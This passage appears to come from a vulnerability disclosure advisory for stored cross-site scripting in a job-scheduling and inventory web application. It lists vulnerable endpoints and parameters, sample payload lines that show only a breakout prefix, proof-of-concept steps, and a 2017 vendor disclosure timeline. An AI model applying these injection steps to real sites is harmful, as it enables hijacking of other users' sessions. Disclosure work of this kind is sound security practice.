+- Name +- Description +- ExecutionBatches[0].Name +- ExecutionBatches[0].Description +- Labels + +# Sample payload +'"> + +# PROOF OF CONCEPT +- Go to the "Job Scheduling > Add New Suite" tab +- Enter the XSS payload onto the affected parameters +- Once the user view details of this suite, the XSS would be executed + +========================================================== + +# Vulnerable URL 4 (Resource Template Function) +/RM/AbstractTemplate/AddOrUpdateAbstractTemplate + +# Vulnerable parameter(s) +- Alias +- Description + +# Sample payload +'"> + +# PROOF OF CONCEPT +- Go to the "Inventory > abstract template > Add New" tab +- Enter the XSS payload onto the affected parameters +- Once the user click on the more info button of the item, the XSS would be executed + +========================================================== + +# Timeline +- 06/06/2017: Vulnerability found +- 20/06/2017: Vendor informed +- 20/06/2017: Vendor responded and acknowledged +- 16/07/2017: Vendor fixed the issue +- 12/08/2017: Vendor agreed on public disclosure +- 14/08/2017: Public disclosure